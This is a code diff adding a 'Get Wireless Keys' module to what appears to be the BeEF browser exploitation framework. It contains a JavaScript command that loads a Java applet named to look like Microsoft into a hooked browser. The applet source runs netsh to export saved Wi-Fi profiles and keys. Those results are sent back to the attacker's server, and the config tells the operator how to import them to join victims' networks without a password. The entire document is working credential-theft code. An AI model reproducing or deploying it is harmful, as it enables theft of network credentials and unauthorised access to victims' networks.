Module for Issue 639 - Retrieving Clear Text Wireless Keys from Compromised Systems

modules/host/get_wireless_keys/command.js

@@ -0,0 +1,30 @@
+//
+//   Copyright 2011 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+    var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/wirelessZeroConfig.jar';
+    var applet_id = '<%= @applet_id %>';
+    var applet_name = '<%= @applet_name %>';
+    var output;
+    beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'wirelessZeroConfig' ,
+       	null, applet_archive, null);
+    output = document.Microsoft_Corporation.getInfo();
+    if (output) {
+	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+output);
+    }
+    beef.dom.detachApplet('wirelessZeroConfig');
+});
+
+

modules/host/get_wireless_keys/config.yaml

@@ -0,0 +1,26 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        get_wireless_keys:
+            enable: true
+            category: "Host"
+            name: "Get Wireless Keys"
+            description: "This module will retrieve the wireless profiles from the target computer. <br/> You will need to copy the results to 'exported_wlan_profiles.xml' and then reimport back into your Windows Vista/7 computers by running the command netsh wlan add profile filename=\"exported_wlan_profiles.xml\".  <br/>After that, just launch and connect to the wireless network without any password prompt.  <br/><br/> For more information, refer to http://pauldotcom.com/2012/03/retrieving-wireless-keys-from.html"
+            authors: ["keith_lee @keith55 http://milo2012.wordpress.com"]
+            target:
+                working: ["IE"]
+                user_notify: ["C", "S", "O", "FF"]

modules/host/get_wireless_keys/module.rb

@@ -0,0 +1,35 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Get_wireless_keys < BeEF::Core::Command
+  
+	def pre_send
+		BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_wireless_keys/wirelessZeroConfig.jar','/wirelessZeroConfig','jar')
+	end
+  
+	def post_execute
+		content = {}
+		content['result'] = @datastore['result'].to_s
+		save content
+		f = File.open("exported_wlan_profiles.xml","w+")
+		f.write((@datastore['results']).sub("result=",""))
+  		writeToResults = Hash.new
+   		writeToResults['data'] = "Please import "+Dir.pwd+"/exported_wlan_profiles.xml into your windows machine"
+		BeEF::Core::Models::Command.save_result(@datastore['beefhook'], @datastore['cid'] , @friendlyname, writeToResults)
+		BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/wirelessZeroConfig.jar')
+	end
+  
+end
+

modules/host/get_wireless_keys/wirelessZeroConfig.java

@@ -0,0 +1,113 @@
+import java.io.*;  
+import java.util.*;
+import java.net.*;
+import java.applet.*;
+
+// Keith Lee
+// Twitter: @keith55
+// http://milo2012.wordpress.com
+// keith.lee2012[at]gmail.com
+
+public class wirelessZeroConfig extends Applet{  
+	public static String result = "";
+		
+	public wirelessZeroConfig(){
+		super();
+		return;
+	}
+	public static String getInfo() {
+		return result;
+	}
+
+	public void init() {
+		if (isWindows()) {
+			String osVersion= System.getProperty("os.version");
+			if(osVersion.equals("6.0") || osVersion.equals("6.1")){
+				result=getWindows();
+			}
+		} else {
+			result = "OS is not supported";
+		}
+	}
+	
+	public static String getWindows(){
+		String cmd1 = "netsh wlan show profiles";
+		String cmd2 = "netsh wlan export profile name=";
+		String keyword1 = "User profiles";
+	 	String wlanProfileArr[];
+		String wlanProfileName;
+		int match = 0;
+		int count = 0;
+		ArrayList<String> profileList = new ArrayList<String>();
+		try {  
+			//Get wlan profile names
+			Process p1 = Runtime.getRuntime().exec(cmd1);  
+			BufferedReader in1 = new BufferedReader(new InputStreamReader(p1.getInputStream()));  
+			String line = null;  
+        		//Checks if string match "User profiles"
+			while ((line = in1.readLine()) != null) {
+				//Checks if string match "User profiles"
+				if(match==0){
+					if(line.toLowerCase().contains(keyword1.toLowerCase())){
+						match=1;
+					}
+				}	
+				if(match==1){
+					if(count>1){
+						//If string matches the keyword "User Profiles"
+						line = (line.replaceAll("\\s+$","").replaceAll("^\\s+", ""));
+						if(line.length()>0){
+							wlanProfileName = (line.split(":")[1]).replaceAll("\\s+$","").replaceAll("^\\s+", "");;
+							profileList.add(wlanProfileName);
+						}
+					}
+					count+=1;
+				}
+			}
+			in1.close();	
+	    	} catch (IOException e) { }
+		
+		try{	
+			//Export WLAN Profile to XML file
+			for(Iterator iterator = profileList.iterator(); iterator.hasNext();){
+				String profileName = iterator.next().toString();
+				Process p2 = Runtime.getRuntime().exec(cmd2+'"'+profileName+'"');  
+				//Check if exported xml exists
+				File f = new File("Wireless Network Connection-"+profileName+".xml");
+				if(f.exists()){	
+					//Read contents of XML file into results variable
+					FileInputStream fstream = new FileInputStream(f);
+					DataInputStream in2 = new DataInputStream(fstream);
+					BufferedReader br = new BufferedReader(new InputStreamReader(in2));
+					String xmlToStr;
+					while((xmlToStr = br.readLine()) != null){			
+						result+=xmlToStr;
+					}
+					in2.close();				
+				}
+			}
+	    } catch (IOException e) {  
+        }
+		return result;   
+	}
+
+	public static boolean isWindows() {
+		String os = System.getProperty("os.name").toLowerCase();
+		return (os.indexOf("win") >= 0);
+	}
+	
+	/**
+	public static void main(String[] args) {
+		if (isWindows()) {
+			String osVersion= System.getProperty("os.version");
+			System.out.println(osVersion);
+			if(osVersion.equals("6.0") || osVersion.equals("6.1")){
+				result=getWindows();
+			}
+		} else {
+			result = "OS is not supported";
+		}
+		System.out.println(result);
+	}
+	**/
+}